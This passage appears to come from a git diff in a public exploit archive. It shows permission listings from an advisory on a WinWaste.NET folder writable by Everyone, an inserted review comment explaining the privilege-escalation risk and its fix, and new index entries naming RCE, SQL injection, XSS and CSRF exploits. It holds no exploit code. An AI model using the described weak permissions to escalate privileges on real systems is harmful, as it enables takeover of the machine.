+C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
+C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
+ NT SERVICE\TrustedInstaller:(ID)F
+ NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
+ BUILTIN\Users:(ID)R
+ BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
+ GENERIC_READ
+ GENERIC_EXECUTE
+
+ CREATOR OWNER:(OI)(CI)(IO)(ID)F
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
+ GENERIC_READ
+ GENERIC_EXECUTE
+
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
+ GENERIC_READ
+ GENERIC_EXECUTE
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a750390d9..c5d17ce4b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
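Review bot: The actual finding is never stated; the reader has to extract it from Italian `icacls`/`cacls` output, where the relevant entries are `Everyone:(I)(M)` on `WinWasteService.exe` and `Everyone:(I)(OI)(CI)(M)` on `WW.PROG` — Modify for Everyone on a binary that the `sc qc` block shows starting automatically (`AUTO_START`) as `LocalSystem`. A sentence after `(3) Details:` spelling that out, plus translations of the labels (`OPERAZIONI RIUSCITE` = SUCCESS, `AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI` = APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES, `accesso speciale` = special access, `Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file` = Successfully processed 1 files; Failed processing 0 files), would make the entry readable without re-running the commands. The `(I)` and `(ID)` flags show the Everyone grant is inherited rather than set on the file, and the directory's own entry is inherited too, so the remediation to record is removing the Modify grant at whichever parent folder the installer created it on and having the installer stop granting it; the entry gives no vendor-fix status. The `cacls` listings duplicate the `icacls` ones and could be dropped.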
@@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port
 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
 50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
+50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port
 50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
 50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
+50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,
+50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware,
+50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php,
+50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
+50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
+50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,